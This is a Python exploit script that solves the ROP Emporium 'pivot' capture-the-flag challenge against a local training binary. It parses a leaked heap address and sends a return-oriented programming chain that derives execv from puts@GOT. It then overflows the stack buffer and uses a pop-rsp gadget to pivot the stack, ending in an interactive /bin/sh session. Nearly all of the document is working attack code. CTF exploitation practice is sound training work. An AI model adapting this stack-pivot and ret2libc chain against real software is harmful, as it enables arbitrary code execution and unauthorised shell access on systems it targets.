Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html)

ROPEmporium_Pivot.py

'''

Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html)
It pops a remote shell.
Run the binary with: nc -lvc ./pivot -p 4444
Then, run this exploit :)

'''

import socket
from struct import pack
import telnetlib

def p64(x):
	return pack('<q', x)


s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 4444))

data = s.recv(1000)
# print data
print "[+] Connected!"

while str.find(data, "to pivot: ") == -1:
	data += s.recv(1000)
# print data

pivot = str.find(data, "to pivot: ")
pivot = data[pivot+len("to pivot: "):pivot+len("to pivot: ")+14]

print "[+] Got Pivot: ", pivot
pivot = int(pivot, 16)

command = '/bin/sh\x00'

rop = command
rop += 'C'*8*3 # r13, r14, r15
rop += p64(0x400b00) # pop rax; ret; Set RAX=puts@got
rop += p64(0x602020) # puts@got
rop += p64(0x400900) # pop rbp; ret;
rop += p64(0x5D1D0) # execv-puts offset
rop += p64(0x400b05) # mov rax, qword [rax]; ret; Set RAX=*puts@got (real memory address)
rop += p64(0x400b09) # add rax, rbp; ret; Add offset to calculate the execv position in memory
rop += p64(0x400b73) # pop rdi; ret; prepare arguments for execv: execv(rdi="bin/sh", rsi=0x0=NULL)
rop += p64(pivot) # rdi
rop += p64(0x400b71) # pop rsi; pop r15; ret;
rop += p64(0x0) # rsi
rop += p64(0x0) # r15
rop += p64(0x400943) # jmp rax; Call execv (memory address calculated on RAX)
rop += '\n'

s.send(rop)
data += s.recv(1000)
print "[+] Pivot ROP sent.."

rop = 'A'*40
rop += p64(0x400b6d) # pop rsp; pop r13; pop r14; pop r15; ret; Create new stack frame on the first buffer (pivot)
rop += p64(pivot+len(command))
rop += 'B'*8
rop += '\n'
print "[+] Overflow ROP sent.."

s.send(rop)
data += s.recv(1000)

print "[+] Shell popped!"

t = telnetlib.Telnet()
t.sock = s
t.interact()

#s.close()